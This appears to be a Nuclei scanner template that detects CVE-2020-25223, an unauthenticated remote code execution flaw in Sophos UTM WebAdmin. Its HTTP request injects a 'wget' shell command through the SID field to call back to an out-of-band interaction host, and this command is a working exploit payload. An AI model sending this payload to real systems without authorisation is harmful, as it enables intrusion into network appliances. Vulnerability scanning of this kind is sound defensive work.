id: CVE-2020-25223
info:
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
remediation: |
Apply the latest security patches provided by Sophos to mitigate the vulnerability.
reference:
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
- https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
- https://nvd.nist.gov/vuln/detail/CVE-2020-25223
- https://community.sophos.com/b/security-blog
- https://cwe.mitre.org/data/definitions/78.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-25223
cwe-id: CWE-78
epss-score: 0.97433
epss-percentile: 0.99923
cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sophos
product: unified_threat_management
tags: cve,cve2020,sophos,rce,oast,unauth,kev
http:
- raw:
- |
POST /var HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Origin: {{BaseURL}}
Connection: close
Referer: {{BaseURL}}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 490a0046304402204bee467341393d3da084b840d79b0d987ae26c2629542893f1fd5636ac5ae8a902202df8b9e6be93f28d6c2a12defd89cd2abe0257acd82ca7f4712c32e1996cdd77:922c64590222798bb761d5b6d8e72950